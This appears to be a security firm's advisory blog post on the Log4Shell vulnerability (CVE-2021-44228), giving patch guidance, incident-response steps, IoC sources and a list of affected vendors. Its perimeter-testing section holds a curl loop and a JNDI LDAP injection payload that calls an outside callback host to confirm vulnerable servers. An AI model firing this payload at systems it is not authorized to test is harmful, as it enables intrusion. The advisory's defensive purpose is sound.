Update as of Wednesday, December, 15
It has been discovered the Log4j 2.15.0 RC2 patch does not properly remediate the Log4j vulnerabilities. We are now recommending you upgrade to version 2.16.0.
https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0
Update as of Tuesday, December, 14
As promised, we’re continuing to update this page as we find and new information is made public about CVE-2021-44228. Below are recent observations, information about IoCs, and steps you can take to check for vulnerabilities.
How to Quickly Check Your Perimeter for Vulnerability
- Go to https://log4shell.huntress.com to receive your custom payload for testing.
- Save this payload to a text document for reference later.
- Click the link to “View Connections”
- Create a list of all URLs in your environment you wish to scan and save them into a text file named “URLTarget.txt,” I.E.:
- On any linux system – execute the following bash command:
for line in $(cat URLTarget.txt); do echo $line >> output; curl -k $line -H ‘X-API-Version: ${jndi:ldap://log4shell.huntress.com:1389/YOURCUSTOMPAYLOADHERE}’ –output – >> output; done - Monitor the Huntress tool for any connections. Any connections logged confirm a vulnerable server.
- All CURL activity is logged in the “output” file.
- If any of your external applications have input fields, use the custom payload (full string starting with $) and enter that payload into any input fields that are available. Again, any connections logged on the Huntress “View Connections” page confirm a vulnerable server.
***A negative test does not guarantee that your application is not vulnerable.***
What Are We Observing at This Point?
Simply put—massive scanning and exploitation.
At this time, it appears that attackers are utilizing the vulnerability to drop coin miners, command and control beacons, reverse shells, and (in some cases) deploy ransomware.
Where Can I Find IoCs?
IoCs are moving targets!
Trying to block all “malicious” IPs is not enough. Your focus should be targeted on identifying vulnerable servers—ensuring those servers are remediated—and FULLY investigating the systems for signs of compromise.
As we mentioned before, if you identify a compromised system, we recommend restoring from backup pre-datingDecember 9, 2021, while retaining a copy of the compromised server for forensic investigation.
Your network infrastructure should be closely analyzed for signs of lateral movement and further persistence.
The first thing to do is review all of your application logs for “jndi” requests. Investigate all hits and determine if the exploit was successful. We are now seeing attackers implement obfuscation techniques through the usage of encoded commands to evade detection. Therefore, no hits in logs for “jndi” does not guarantee exploit has not occurred.
Comprehensive IoC List
The following is a comprehensive IoC list that has been created by “Curated Intel”:
Please note: these feeds are considered LOW-TO-MEDIUM confidence. I would NOT add these to your blocklist, but rather a watchlist. If confirmed malicious, then apply appropriate blocks.
https://github.com/curated-intel/Log4Shell-IOCs
Here is a list of vendor responses tracked so far (credit to SwitHak for their curation of this):
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Royce Williams has also published a very comprehensive analysis of “The Story So Far.” I recommend everyone give this a read:
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
Further Assistance
Again, if you identify any indicators of compromise and need further assistance, please reach out at .
We will continue to release updates as the situation progresses and we learn more.
On December 9, a critical vulnerability in Log4j was made public. This is widespread and exploits critical vulnerability CVE-2021-44228—affecting the java logging package. Our team at FRSecure is continuing to investigate this active exploit. Below, we’re providing known details and suggested steps for protection as this continues to evolve and we continue to learn more.
Affected Entities
Log4j is embedded in a significant amount of software.
Below is the list of known affected applications and vendors. As this is still evolving, the list will likely expand.
- Apple
- Tencent
- Steam
- Baidu
- DIDI
- JD
- NetEase
- CloudFlare
- Amazon
- Tesla
- Apache Solr
- Apache Druid
- Apache Struts2
- IBM Qradar SIEM
- PaloAlto Panorama
- ElasticSearch
- ghidra
- ghidra server
- Minecraft
- PulseSecure
- UniFi
- VMWare
- Blender
- Webex
- VMWare vCenter
CVE-2021-44228 Observations and Suggestions
An extremely high volume of malicious traffic has been observed actively exploiting vulnerable systems since at least Friday, December 10, 2021.
Apply the Patch
If you are using the Log4j library, you should immediately upgrade to log4j-2.15.0.rc2. ALL previous versions of log4j should be considered affected. You can find the download for this upgrade at https://logging.apache.org/log4j/2.x/download.html.
If you cannot apply the patch, remove the JndiLookup class from the classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Utilize the Huntress Identification Tool
Our friends over at Huntress have released a tool to help you identify if you are currently vulnerable.
We recommend using this to test all externally available systems in your environment.
*Disclaimer – a negative test does not guarantee your application is not affected.
You can access the tool here:
https://log4shell.huntress.com/
If You Find Vulnerabilities within Your Systems
If any vulnerable systems are identified in your environment, we recommend fully investigating for indicators of compromise.
If IoCs are identified, we recommend restoring the system from a backup pre-dating December 9, 2021.
We also recommend retaining a copy of the compromised system for forensic investigation.
If you identify a compromised system in your environment, you should also investigate and monitor other systems within your enterprise for signs of lateral movement and persistence.
Final Thoughts
This is an active exploit that is widespread among popular applications and software. Please do your due diligence in identifying vulnerable and/or compromised systems within your environment. And if you identify any indicators of compromise and need further assistance, please reach out at .
We will continue to release updates as the situation progresses and we learn more.